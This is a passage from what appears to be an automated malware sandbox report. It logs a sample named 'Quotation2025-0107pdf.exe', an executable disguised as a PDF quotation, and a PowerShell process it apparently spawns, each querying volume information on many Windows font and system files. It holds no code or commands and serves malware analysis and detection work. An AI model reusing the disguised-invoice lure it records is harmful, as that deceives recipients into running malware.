                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
